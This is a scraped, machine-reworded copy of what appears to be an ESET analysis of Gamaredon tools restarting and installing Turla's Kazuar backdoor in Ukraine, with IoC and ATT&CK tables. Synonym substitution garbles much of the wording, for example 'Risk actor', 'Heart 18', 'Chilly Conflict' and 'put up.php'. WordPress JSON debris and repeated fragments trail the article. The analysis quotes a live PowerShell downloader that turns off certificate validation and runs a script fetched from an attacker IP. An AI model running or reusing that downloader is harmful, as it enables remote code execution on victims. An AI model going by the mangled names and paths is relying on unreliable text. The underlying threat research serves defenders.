On this blogpost, we uncover the primary recognized circumstances of collaboration between Gamaredon and Turla, in Ukraine.<\/p>\n

\n
Key factors of this blogpost:<\/strong><\/p>\n
\n
In February 2025, we found that the Gamaredon device PteroGraphin was used to restart Turla\u2019s Kazuar backdoor on a machine in Ukraine.<\/li>\n
In April and June 2025, we detected that Kazuar v2 was deployed utilizing Gamaredon instruments PteroOdd and PteroPaste.<\/li>\n
These discoveries lead us to imagine with excessive confidence that Gamaredon is collaborating with Turla.<\/li>\n
Turla\u2019s sufferer depend could be very low in comparison with the variety of Gamaredon compromises, suggesting that Turla select essentially the most useful machines.<\/li>\n
Each teams are affiliated with the FSB, Russia\u2019s important home intelligence and safety company.<\/li>\n<\/ul>\n<\/blockquote>\n
Risk actor profiles<\/h2>\n
Gamaredon<\/h3>\n
Gamaredon<\/a> has been lively since no less than 2013. It’s accountable for many assaults, principally towards Ukrainian governmental establishments, as evidenced over time in a number of reviews<\/a> from CERT-UA<\/a> and from different official Ukrainian our bodies. Gamaredon has been attributed by the Safety Service of Ukraine (SSU)<\/a> to the Heart 18 of Info Safety of the FSB, working out of occupied Crimea. We imagine this group to be collaborating <\/a>with one other risk actor that we found and named InvisiMole<\/a>.<\/p>\n
Turla<\/h3>\n
Turla, also referred to as Snake, is an notorious cyberespionage group that has been lively since no less than 2004, probably extending again into the late Nineteen Nineties. It’s regarded as a part of the FSB<\/a>. It primarily focuses on high-profile targets, equivalent to governments and diplomatic entities, in Europe, Central Asia, and the Center East. It’s recognized for having breached main organizations such because the US Division of Protection in 2008 and the Swiss protection firm RUAG in 2014. In the course of the previous few years, we have<\/a> documented<\/a> a massive<\/a> half<\/a> of Turla\u2019s<\/a> arsenal<\/a> on the WeLiveSecurity weblog and in non-public reviews<\/a>.<\/p>\n
Overview<\/h2>\n
In February 2025, by way of ESET telemetry, we detected 4 totally different Gamaredon-Turla co-compromises in Ukraine. On these machines, Gamaredon deployed a variety of instruments, together with PteroLNK<\/a>, PteroStew, PteroOdd, PteroEffigy, and PteroGraphin, whereas Turla solely deployed Kazuar v3.<\/p>\n
On a kind of machines, we had been in a position to seize a payload displaying that Turla is ready to challenge instructions by way of Gamaredon implants. PteroGraphin was used to restart Kazuar, probably after Kazuar crashed or was not launched routinely. Thus, PteroGraphin was most likely used as a restoration technique by Turla. That is the primary time that we have now been in a position to hyperlink these two teams collectively by way of technical indicators (see First chain: Restart of Kazuar v3<\/a><\/em>).<\/p>\n
As a result of, in all 4 circumstances, the ESET endpoint product was put in after the compromises we’re unable to pinpoint the precise compromise technique. Nevertheless, Gamaredon is thought for utilizing spearphishing and malicious LNK recordsdata on detachable drives (as defined in our current blogpost<\/a>) so we presume that one among these is the most probably compromise vector.<\/p>\n
In April and June 2025, we detected Kazuar v2 installers being deployed straight by Gamaredon instruments (see Second chain: Deployment of Kazuar v2 by way of PteroOdd<\/a><\/em> and Third chain: Deployment of Kazuar v2 by way of PteroPaste<\/a><\/em>). This reveals that Turla is actively collaborating with Gamaredon to achieve entry to particular machines in Ukraine.<\/p>\n
Victimology<\/h2>\n
Over the previous 18 months we have now detected Turla on seven machines in Ukraine. We imagine that Gamaredon compromised the primary 4 machines in January 2025, whereas Turla deployed Kazuar v3 in February 2025. In all circumstances, the ESET endpoint product was solely put in after each compromises.<\/p>\n
It’s price noting that, previous to this, the final time we detected a Turla compromise in Ukraine was in February 2024.<\/p>\n
All these parts, and the truth that Gamaredon is compromising tons of if not hundreds of machines, counsel that Turla is solely in particular machines, most likely ones containing extremely delicate intelligence.<\/p>\n
Attribution<\/h3>\n
Gamaredon<\/h4>\n
In these compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we imagine are unique to Gamaredon.<\/p>\n
Turla<\/h4>\n
Equally, for Turla, we detected the usage of Kazuar v2 and Kazuar v3, which we imagine are unique to that group.<\/p>\n
Gamaredon-Turla collaboration hypotheses<\/h3>\n
In 2020, we confirmed that Gamaredon supplied entry to InvisiMole (see our white paper<\/a>), so it’s not the primary time that Gamaredon has collaborated with one other Russia-aligned risk actor.<\/p>\n
Then again, Turla is thought for hijacking different risk actors\u2019 infrastructure to get an preliminary foothold in its targets\u2019 networks. Over the previous years, a number of circumstances have been publicly documented:<\/p>\n
\n
In 2019, Symantec printed a blogpost<\/a> displaying that Turla hijacked OilRig (an Iran-aligned group) infrastructure to spy on a Center Japanese goal.<\/li>\n
In 2023, Mandiant printed a blogpost<\/a> displaying that Turla reregistered expired Andromeda C&C domains in an effort to compromise targets in Ukraine.<\/li>\n
In 2024, Microsoft printed two blogposts (first<\/a> and second<\/a>) displaying that Turla hijacked the cybercrime botnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) in an effort to deploy Kazuar.<\/li>\n<\/ul>\n
Be aware that each Gamaredon and Turla are a part of the Russian Federal Safety Service (FSB). Gamaredon is regarded as operated by officers of Heart 18 of the FSB (aka the Heart for Info Safety) in Crimea (see this report<\/a> from the Safety Service of Ukraine), which is a part of the FSB\u2019s counterintelligence service. As for Turla, the UK\u2019s NCSC<\/a> attributes the group to the Heart 16 of the FSB, which is Russia\u2019s important alerts intelligence (SIGINT) company.<\/p>\n
Due to this fact, we suggest three hypotheses to clarify our observations:<\/p>\n
\n
Very doubtless<\/strong>: Provided that each teams are a part of the Russian FSB (although in two totally different Facilities), Gamaredon supplied entry to Turla operators in order that they might challenge instructions on a selected machine to restart Kazuar, and deploy Kazuar v2 on some others.<\/li>\n
Unlikely<\/strong>: Turla compromised Gamaredon infrastructure and leveraged this entry to recuperate entry on a machine in Ukraine. Since PteroGraphin accommodates a hardcoded token that permits modifying the C&C pages, this risk can’t be absolutely discarded. Nevertheless, it implies that Turla was in a position to reproduce the total Gamaredon chain.<\/li>\n
Unlikely<\/strong>: Gamaredon has entry to Kazuar and deploys it on very particular machines. Given Gamaredon\u2019s noisy method, we don\u2019t suppose it might be that cautious deploying Kazuar on solely a really restricted set of victims.<\/li>\n<\/ul>\n
Geopolitical context<\/h3>\n
From an organizational perspective, it’s price noting that the 2 entities generally related to Turla and Gamaredon have a protracted historical past of reported collaboration, which may be traced again to the Chilly Conflict period.<\/p>\n
The FSB\u2019s Heart 16 (which is believed to harbor Turla) is a direct inheritor<\/a> to the KGB\u2019s 16^{th<\/sup> Directorate, which was primarily accountable for international SIGINT assortment \u2013 the persistence of the quantity 16 is in truth regarded by observers as an indication of the FSB management\u2019s want to emphasise}a historic lineage<\/a>. Heart 18 (which is usually related to Gamaredon) maintains a tough affiliation with the KGB\u2019s 2^{nd<\/sup> Chief Directorate, which was accountable for inner safety throughout the Soviet Union. In the course of the Soviet period, each organizations ceaselessly labored hand in hand, sharing obligations for}monitoring international embassies<\/a> on Russian soil for example.<\/p>\n
Then and now, such collaborations replicate the Russian strategic tradition and philosophy of a pure continuity between inner safety and nationwide protection. Though Heart 16 remains to be tasked with international intelligence assortment and Heart 18 is theoretically a part of the FSB\u2019s counterintelligence equipment, each entities appear to take care of some mission overlaps \u2013 particularly with regard to former Soviet republics. In 2018, the Safety Service of Ukraine (SBU) had already noticed Facilities 16 and 18 apparently conducting a joint cyberespionage marketing campaign<\/a> (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has most likely bolstered this convergence, with ESET knowledge clearly displaying Gamaredon and Turla actions specializing in the Ukrainian protection sector in current months.<\/p>\n
Though the Russian intelligence neighborhood is thought for its fierce inner rivalries<\/a>, there are indications that such tensions mainly apply to interservice relations relatively than to intra-agency interactions. On this context, it’s maybe not solely shocking that APT teams working inside these two FSB Facilities are noticed cooperating to some extent.<\/p>\n
First chain: Restart of Kazuar v3 <\/h2>\n
In February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine. On this part we element the precise chain that we detected.<\/p>\n
Timeline<\/h3>\n
The general timeline for this machine is the next:<\/p>\n
\n
2025-01-20: Gamaredon deployed PteroGraphin on the machine. Be aware that the date is from the file creation timestamp supplied by Home windows, which may have been tampered with.<\/li>\n
2025-02-11: Turla deployed Kazuar v3 on the machine. Be aware that the date is from the file creation timestamp supplied by Home windows, which may have been tampered with.<\/li>\n
2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.<\/li>\n
2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which executed Kazuar.<\/li>\n
2025-02-28 15:17:14 UTC: PteroOdd downloaded one other payload, which additionally executed Kazuar.<\/li>\n<\/ul>\n
Hereafter, we assume these dates to be unaltered.<\/p>\n
Particulars of the occasions<\/h3>\n
Since January 20^{th<\/sup>, 2025, PteroGraphin (see Determine 1) was current on the machine at %APPDATApercentx86.ps1<\/span>. It’s a downloader that gives an encrypted channel for delivering payloads by way of}Telegra.ph<\/a>, an online service operated by Telegram that permits straightforward creation of internet pages. Be aware that PteroGraphin accommodates a token to edit the Telegra.ph web page, so anybody with data of this token (Turla, for instance, although unlikely) may manipulate the contents.<\/p>\n
$\"Figure$
Determine 1. PteroGraphin (token partially redacted)<\/em><\/figcaption><\/figure>\n
On February 27^{th<\/sup>, 2025, at 15:47:39 UTC, as proven in Determine 2, we detected a reply from https:\/\/api.telegra[.]ph\/getPage\/SecurityHealthSystray-01-20?return_content=true<\/span>.<\/p>\n}
$\"Figure$
Determine 2. Beautified JSON reply<\/em><\/figcaption><\/figure>\n
The info in kids<\/span> may be decrypted utilizing the hardcoded 3DES key and IV from the PteroGraphin script above, which provides:<\/p>\n
powershell -windowStyle hidden -EncodedCommand <\/span><\/p>\n
The decoded payload is one other PowerShell downloader that we named PteroOdd, proven in Determine 3.<\/p>\n
$\"Figure$
Determine 3. PteroOdd<\/em><\/figcaption><\/figure>\n
On February 27^{th<\/sup>, 2025 at 15:47:56 UTC, we detected a request to https:\/\/api.telegra[.]ph\/getPage\/dinoasjdnl-02-27?return_content=true<\/span>; the reply\u00a0is proven in Determine 4. Be aware that the replies for PteroOdd will not be encrypted.<\/p>\n}
$\"Figure$
Determine 4. PteroOdd JSON reply (beautified and partially redacted)<\/em><\/figcaption><\/figure>\n
The decoded command is proven in Determine 5.<\/p>\n
$\"Figure$
Determine 5. Decoded PowerShell command (username redacted)<\/em><\/figcaption><\/figure>\n
The payload first uploads the sufferer\u2019s pc title and system drive\u2019s quantity serial quantity to the Cloudflare employee subdomain https:\/\/lucky-king-96d6.mopig92456.employees[.]dev<\/span>.<\/p>\n
What’s most fascinating is the final line:<\/p>\n
Begin-Course of -FilePath “C:Customers[redacted]AppDataLocalProgramsSonyAudioDriversvncutil64.exe”<\/span><\/p>\n
That is the trail to the applying that’s run to execute Kazuar by side-loading it. The ESET endpoint product detected a KERNEL<\/span> Kazuar v3 payload (agent_label<\/span> is AGN-RR-01<\/span>) in reminiscence and loaded from this course of. It’s not clear to us why Turla operators had to make use of PteroGraphin to launch Kazuar, however it’s attainable that Kazuar one way or the other stopped working after the ESET product set up and that they needed to restart the implant. Be aware that we didn\u2019t see Gamaredon downloading Kazuar; it was current on the system since February 11^{th<\/sup>, 2025, earlier than the ESET product was put in.<\/p>\n}
Then, on February 28^{th<\/sup>, 2025 at 15:17:14 UTC, we detected one other comparable PowerShell script, proven in Determine 6.<\/p>\n}
$\"Figure$
Determine 6. Second PowerShell command executing Kazuar<\/em><\/figcaption><\/figure>\n
The primary strains and the Cloudflare employee subdomain are an identical. It begins the identical vncutil64.exe<\/span> but additionally a second executable, LaunchGFExperience.exe<\/span>, which side-loads LaunchGFExperienceLOC.dll<\/span> \u2013 the Kazuar loader. We then detected in reminiscence, within the LaunchGFExperience.exe<\/span> course of, one other KERNEL<\/span> Kazuar v3 payload (agent_label<\/span> is AGN-XX-01<\/span>). It’s not clear why two totally different KERNEL<\/span> Kazuar v3 payloads had been current on the identical machine.<\/p>\n
Lastly, an HTTP POST request, with the checklist of operating processes, was despatched to https:\/\/eset.ydns[.]eu\/put up.php<\/span>. The Turla operators most probably needed affirmation that Kazuar was efficiently launched.<\/p>\n
On March 10^{th<\/sup>, 2025 at 07:05:32 UTC, we detected one other pattern of PteroOdd, which makes use of the C&C URL https:\/\/api.telegra[.]ph\/getPage\/canposgam-03-06?return_content=true<\/span>. This pattern was detected on a distinct machine in Ukraine, on which Kazuar was additionally current.<\/p>\n}
The decoded payload is proven in Determine 7 and reveals that it additionally makes use of eset.ydns[.]eu<\/span>, whereas not interacting with any Turla pattern.<\/p>\n
Then again, we famous that the downloaded payload uploads the next items of data to https:\/\/eset.ydns[.]eu\/put up.php<\/span>:<\/p>\n
Nevertheless, we aren’t conscious of any .NET device that’s presently being utilized by Gamaredon, whereas there are a number of of them utilized by Turla, together with Kazuar. Thus, it’s attainable that these uploaded items of data are for Turla, and we assess with medium confidence that the area eset.ydns[.]eu<\/span> is managed by Turla.<\/p>\n
$\"Figure$
Determine 7. PteroOdd pattern<\/em><\/figcaption><\/figure>\n
The extra base64-encoded PowerShell command is a brand new downloader that abuses api.gofile[.]io<\/span>; we named it PteroEffigy.<\/p>\n
Kazuar v3<\/h3>\n
Kazuar v3 is the newest department of the Kazuar household, itself a complicated C# espionage implant that we imagine is used solely by Turla because it was first seen in 2016. Kazuar v2 and v3 are basically the identical malware household and share the identical codebase. Nevertheless, some main adjustments have been launched.<\/p>\n
Kazuar v3 contains round 35% extra C# strains than Kazuar v2 and introduces extra community transport strategies: over internet sockets and Trade Net Companies. Kazuar v3 can have one among three roles (KERNEL<\/span>, BRIDGE<\/span>, or WORKER<\/span>), and malware functionalities are divided amongst these roles. For instance, solely BRIDGE<\/span> communicates with the C&C server.<\/p>\n
Second chain: Deployment of Kazuar v2 by way of PteroOdd<\/h2>\n
On one of many Ukrainian machines talked about within the earlier part, we detected one other fascinating compromise chain on April 18^{th<\/sup>, 2025.<\/p>\n}
On April 18^{th<\/sup>, 2025 at 15:26:14 UTC, we detected a PteroOdd pattern (a Gamaredon device) downloading a payload from https:\/\/api.telegra[.]ph\/getPage\/scrsskjqwlbw-02-28?return_content=true<\/span>. The downloaded script, proven in Determine 8, is much like the payload described within the first chain, however accommodates a further base64-encoded script, which is the PowerShell downloader PteroEffigy.<\/p>\n}
$\"Figure$
Determine 8. Payload downloaded by PteroOdd<\/em><\/figcaption><\/figure>\n
This PowerShell payload downloads one other payload from https:\/\/eset.ydns[.]eu\/scrss.ps1<\/span> and executes it.<\/p>\n
scrss.ps1<\/span> turned out to be an installer for Turla\u2019s Kazuar v2, which was beforehand analyzed intimately by Unit42<\/a>. This reveals that Gamaredon deployed Kazuar, most probably on behalf of Turla.<\/p>\n
The Kazuar agent_label<\/span> is AGN-AB-26<\/span> and the three C&C servers are:<\/p>\n
\n
https:\/\/abrargeospatial[.]ir\/wp-includes\/fonts\/wp-icons\/index.php<\/span><\/li>\n
https:\/\/www.brannenburger-nagelfluh[.]de\/wp-includes\/style-engine\/css\/index.php<\/span><\/li>\n
https:\/\/www.pizzeria-mercy[.]de\/wp-includes\/pictures\/media\/bar\/index.php<\/span><\/li>\n<\/ul>\n
It’s price noting that Turla retains utilizing compromised WordPress servers as C&Cs for Kazuar.<\/p>\n
Curiously, it appears that evidently Kazuar v2 remains to be maintained in parallel to Kazuar v3. For instance, the current updates to the backdoor instructions in Kazuar v3 are additionally included on this AGN-AB-26<\/span> model.<\/p>\n
Third chain: Deployment of Kazuar v2 by way of PteroPaste <\/h2>\n
On June 5^{th<\/sup> and 6^{th<\/sup>, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In each circumstances, Gamaredon\u2019s PteroPaste was caught attempting to execute the straightforward PowerShell script proven in Determine 9.<\/p>\n}}
$\"Figure$
Determine 9. PowerShell script executed by PteroPaste<\/em><\/figcaption><\/figure>\n
The base64-encoded string is the next downloader in PowerShell:<\/p>\n
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Web.WebClient).downloadString(‘https:\/\/91.231.182[.]187\/ekrn.ps1’);<\/span><\/p>\n
The downloaded script ekrn.ps1<\/span> is similar to scrss.ps1<\/span> talked about within the second chain. This additionally drops and installs Kazuar v2.<\/p>\n
Each samples have an agent_label<\/span> of AGN-AB-27<\/span> and the C&C servers are the identical as these within the pattern from the second chain:<\/p>\n
\n
https:\/\/www.brannenburger-nagelfluh[.]de\/wp-includes\/style-engine\/css\/index.php<\/span><\/li>\n
https:\/\/www.pizzeria-mercy[.]de\/wp-includes\/pictures\/media\/bar\/index.php<\/span><\/li>\n
https:\/\/abrargeospatial[.]ir\/wp-includes\/fonts\/wp-icons\/index.php<\/span><\/li>\n<\/ul>\n
ekrn.exe<\/span> is a respectable technique of ESET endpoint safety merchandise. Thus, Turla most likely tried to masquerade because it in an effort to fly beneath the radar. Additionally notice that ekrn.ydns[.]eu<\/span> resolves to 91.231.182[.]187<\/span>.<\/p>\n
Lastly, we additionally discovered on VirusTotal<\/a> a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded from Kyrgyzstan on June 5^{th<\/sup>, 2025. This implies that Turla is thinking about targets exterior of Ukraine as nicely.<\/p>\n}
Conclusion<\/h2>\n
On this blogpost, we have now proven how Turla was in a position to leverage implants operated by Gamaredon (PteroGraphin, PteroOdd, and PteroPaste) in an effort to restart Kazuar v3 and deploy Kazuar v2 on a number of machines in Ukraine. We now imagine with excessive confidence that each teams \u2013 individually related to the FSB \u2013 are cooperating and that Gamaredon is offering preliminary entry to Turla.<\/p>\n
\n
For any inquiries about our analysis printed on WeLiveSecurity, please contact us at threatintel@eset.com<\/a>.\u00a0<\/em><\/div>\n
ESET Analysis presents non-public APT intelligence reviews and knowledge feeds. For any inquiries about this service, go to the ESET Risk Intelligence<\/a> web page.<\/em><\/div>\n<\/blockquote>\n
IoCs<\/h2>\n
A complete checklist of indicators of compromise (IoCs) and samples may be present in our GitHub repository<\/a>.<\/p>\n
Information<\/h3>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
SHA-1<\/strong><\/td>\n Filename<\/strong><\/td>\n Detection<\/strong><\/td>\n Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n
7DB790F75829D3E6207D8EC1CBCD3C133F596D67<\/span><\/td>\n N\/A<\/td>\n PowerShell\/Pterodo.QB<\/td>\n PteroOdd.<\/td>\n<\/tr>\n
2610A899FE73B8F018D19B50BE55D66A6C78B2AF<\/span><\/td>\n N\/A<\/td>\n PowerShell\/Pterodo.QB<\/td>\n PteroOdd.<\/td>\n<\/tr>\n
3A24520566BBE2E262A2911E38FD8130469BA830<\/span><\/td>\n N\/A<\/td>\n PowerShell\/Pterodo.QB<\/td>\n PteroOdd.<\/td>\n<\/tr>\n
DA7D5B9AB578EF6487473180B975A4B2701FDA9E<\/span><\/td>\n scrss.ps1<\/span><\/td>\n PowerShell\/Turla.AI<\/td>\n Kazuar v2 installer.<\/td>\n<\/tr>\n
D7DF1325F66E029F4B77E211A238AA060D7217ED<\/span><\/td>\n N\/A<\/td>\n MSIL\/Turla.N.gen<\/td>\n Kazuar v2.<\/td>\n<\/tr>\n
FF741330CC8D9624D791DE9074086BBFB0E257DC<\/span><\/td>\n N\/A<\/td>\n PowerShell\/TrojanDownloader.Agent.DV<\/td>\n PowerShell downloader executed by PteroPaste.<\/td>\n<\/tr>\n
A7ACEE41D66B537D900403F0E6A26AB6A1290A32<\/span><\/td>\n ekrn.ps1<\/span><\/td>\n PowerShell\/Turla.AJ<\/td>\n Kazuar v2 installer.<\/td>\n<\/tr>\n
54F2245E0D3ADEC566E4D822274623BF835E170C<\/span><\/td>\n N\/A<\/td>\n MSIL\/Agent_AGen.CZQ<\/td>\n Kazuar v2.<\/td>\n<\/tr>\n
371AB9EB2A3DA44099B2B7716DE0916600450CFD<\/span><\/td>\n ekrn.ps1<\/span><\/td>\n PowerShell\/Turla.AJ<\/td>\n Kazuar v2 installer.<\/td>\n<\/tr>\n
4A58365EB8F928EC3CD62FF59E59645C2D8C0BA5<\/span><\/td>\n N\/A<\/td>\n MSIL\/Turla.W<\/td>\n Kazuar v2.<\/td>\n<\/tr>\n
214DC22FA25314F9C0DDA54F669EDE72000C85A4<\/span><\/td>\n Sandboxie.vbs<\/span><\/td>\n VBS\/Turla.C<\/td>\n Kazuar v2 installer \u2013 VBScript variant.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
Community<\/h3>\n\n\n\n\n\n\n\n\n\n\n\n\n\n
IP<\/strong><\/td>\n Area<\/strong><\/td>\n Internet hosting supplier<\/strong><\/td>\n First seen<\/strong><\/td>\n Particulars<\/strong><\/td>\n<\/tr>\n<\/thead>\n
N\/A<\/td>\n lucky-king-96d6.mopig92456.employees[.]dev<\/span><\/td>\n N\/A<\/td>\n 2025\u201102\u201128<\/td>\n Cloudflare employee present in payloads downloaded by PteroOdd.<\/td>\n<\/tr>\n
64.176.173[.]164<\/span><\/td>\n eset.ydns[.]eu<\/span><\/td>\n The Fixed Firm, LLC<\/td>\n 2025\u201103\u201101<\/td>\n C&C server present in payloads downloaded by PteroOdd.<\/td>\n<\/tr>\n
85.13.145[.]231<\/span><\/td>\n hauptschule-schwalbenstrasse[.]de<\/span><\/td>\n Neue Medien Muennich GmbH<\/td>\n 2024\u201106\u201106<\/td>\n Compromised WordPress website used as Kazuar C&C.<\/td>\n<\/tr>\n
91.231.182[.]187<\/span><\/td>\n ekrn.ydns[.]eu<\/span><\/td>\n South Park Networks LLC<\/td>\n 2025\u201106\u201105<\/td>\n C&C server in payloads downloaded by PteroPaste.<\/td>\n<\/tr>\n
185.118.115[.]15<\/span><\/td>\n fjsconsultoria[.]com<\/span><\/td>\n Dream Fusion – IT Companies, Lda<\/td>\n 2024\u201106\u201126<\/td>\n Compromised WordPress website used as Kazuar C&C.<\/td>\n<\/tr>\n
77.46.148[.]242<\/span><\/td>\n ingas[.]rs<\/span><\/td>\n TELEKOM SRBIJA a.d.<\/td>\n 2024\u201106\u201103<\/td>\n Compromised WordPress website used as Kazuar C&C.<\/td>\n<\/tr>\n
168.119.152[.]19<\/span><\/td>\n abrargeospatial[.]ir<\/span><\/td>\n Hetzner On-line GmbH<\/td>\n 2023\u201111\u201113<\/td>\n Compromised WordPress website used as Kazuar C&C.<\/td>\n<\/tr>\n
217.160.0[.]33<\/span><\/td>\n www.brannenburger-nagelfluh[.]de<\/span><\/td>\n IONOS SE<\/td>\n 2019\u201106\u201106<\/td>\n Compromised WordPress website used as Kazuar C&C.<\/td>\n<\/tr>\n
217.160.0[.]159<\/span><\/td>\n www.pizzeria-mercy[.]de<\/span><\/td>\n IONOS SE<\/td>\n 2023\u201110\u201105<\/td>\n Compromised WordPress website used as Kazuar C&C.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
MITRE ATT&CK strategies<\/h2>\n
This desk was constructed utilizing model 17<\/a> of the MITRE ATT&CK framework.<\/strong><\/p>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Tactic<\/strong><\/td>\n ID<\/strong><\/td>\n Identify<\/strong><\/td>\n Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n
Useful resource Growth<\/strong><\/td>\n T1583.001<\/a><\/td>\n Purchase Infrastructure: Domains<\/td>\n Gamaredon or Turla registered a website at a free dynamic DNS supplier.<\/td>\n<\/tr>\n
T1583.004<\/a><\/td>\n Purchase Infrastructure: Server<\/td>\n Gamaredon or Turla rented a server at Vultr.<\/td>\n<\/tr>\n
T1583.007<\/a><\/td>\n Purchase Infrastructure: Serverless<\/td>\n Gamaredon created Cloudflare employees and Telegra.ph pages.<\/td>\n<\/tr>\n
T1584.003<\/a><\/td>\n Compromise Infrastructure: Digital Non-public Server<\/td>\n Turla compromised WordPress web sites.<\/td>\n<\/tr>\n
T1608<\/a><\/td>\n Stage Capabilities<\/td>\n Turla staged Kazuar installer scripts on its C&C servers.<\/td>\n<\/tr>\n
Execution<\/strong><\/td>\n T1059.001<\/a><\/td>\n Command and Scripting Interpreter: PowerShell<\/td>\n PteroGraphin is developed in PowerShell.<\/td>\n<\/tr>\n
Persistence<\/strong><\/td>\n T1574.002<\/a><\/td>\n Hijack Execution Circulate: DLL Aspect-Loading<\/td>\n Kazuar loaders use DLL side-loading.<\/td>\n<\/tr>\n
Protection Evasion<\/strong><\/td>\n T1140<\/a><\/td>\n Deobfuscate\/Decode Information or Info<\/td>\n The Kazuar payload is XOR encrypted and all Kazuar strings are encrypted by way of substitution tables.<\/td>\n<\/tr>\n
T1480.001<\/a><\/td>\n Execution Guardrails: Environmental Keying<\/td>\n Kazuar loaders decrypt the payloads, utilizing the machine title as the important thing.<\/td>\n<\/tr>\n
T1036.005<\/a><\/td>\n Masquerading: Match Reputable Identify or Location<\/td>\n Kazuar loaders are situated in legitimate-looking directories equivalent to C:Program Information (x86)Brother PrinterApp<\/span> or %LOCALAPPDATApercentProgramsSonyAudioDrivers<\/span>.<\/td>\n<\/tr>\n
Discovery<\/strong><\/td>\n T1057<\/a><\/td>\n Course of Discovery<\/td>\n The PowerShell script beginning Kazuar v3 sends the checklist of operating processes to its C&C server.<\/td>\n<\/tr>\n
T1012<\/a><\/td>\n Question Registry<\/td>\n The PowerShell script beginning Kazuar v3 will get the PowerShell model from the registry.<\/td>\n<\/tr>\n
T1082<\/a><\/td>\n System Info Discovery<\/td>\n The PowerShell script beginning Kazuar v3 exfiltrates the final boot time, OS model, and OS structure.<\/td>\n<\/tr>\n
T1083<\/a><\/td>\n File and Listing Discovery<\/td>\n The PowerShell script beginning Kazuar v3 lists recordsdata within the directories %TEMP%<\/span> and %APPDATApercentMicrosoftWindows<\/span>.<\/td>\n<\/tr>\n
Command and Management<\/strong><\/td>\n T1071.001<\/a><\/td>\n Utility Layer Protocol: Net Protocols<\/td>\n PteroGraphin and Kazuar use HTTPS.<\/td>\n<\/tr>\n
T1573.001<\/a><\/td>\n Encrypted Channel: Symmetric Cryptography<\/td>\n PteroGraphin decrypts the C&C reply utilizing 3DES.<\/td>\n<\/tr>\n
T1102<\/a><\/td>\n Net Service<\/td>\n Reputable internet companies, equivalent to Telegra.ph, had been used on this marketing campaign.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
$\"\"$ <\/a><\/p>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"
On this blogpost, we uncover the primary recognized circumstances of collaboration between Gamaredon and Turla, in Ukraine. Key factors of this blogpost: In February 2025, we found that the Gamaredon device PteroGraphin was used to restart Turla\u2019s Kazuar backdoor on a machine in Ukraine. In April and June 2025, we detected that Kazuar v2 was […]<\/p>\n","protected":false},"author":2,"featured_media":6919,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[3519,553,5485],"class_list":["post-6917","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-collab","tag-gamaredon","tag-turla"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/6917","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6917"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/6917\/revisions"}],"predecessor-version":[{"id":6918,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/6917\/revisions\/6918"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/6919"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6917"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6917"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6917"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

IoCs<\/h2>\n
A complete checklist of indicators of compromise (IoCs) and samples may be present in our GitHub repository<\/a>.<\/p>\n

Risk actor profiles<\/h2>\n

Attribution<\/h3>\n

Gamaredon<\/h4>\n
In these compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we imagine are unique to Gamaredon.<\/p>\n

Turla<\/h4>\n
Equally, for Turla, we detected the usage of Kazuar v2 and Kazuar v3, which we imagine are unique to that group.<\/p>\n

Risk actor profiles<\/h2>\n

Attribution<\/h3>\n

Gamaredon<\/h4>\nIn these compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we imagine are unique to Gamaredon.<\/p>\n

Turla<\/h4>\nEqually, for Turla, we detected the usage of Kazuar v2 and Kazuar v3, which we imagine are unique to that group.<\/p>\n

Geopolitical context<\/h3>\nFrom an organizational perspective, it’s price noting that the 2 entities generally related to Turla and Gamaredon have a protracted historical past of reported collaboration, which may be traced again to the Chilly Conflict period.<\/p>\n

First chain: Restart of Kazuar v3<\/h2>\nIn February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine. On this part we element the precise chain that we detected.<\/p>\nTimeline<\/h3>\nThe general timeline for this machine is the next:<\/p>\n

Timeline<\/h3>\nThe general timeline for this machine is the next:<\/p>\n

IoCs<\/h2>\nA complete checklist of indicators of compromise (IoCs) and samples may be present in our GitHub repository<\/a>.<\/p>\n

Gamaredon<\/h4>\n
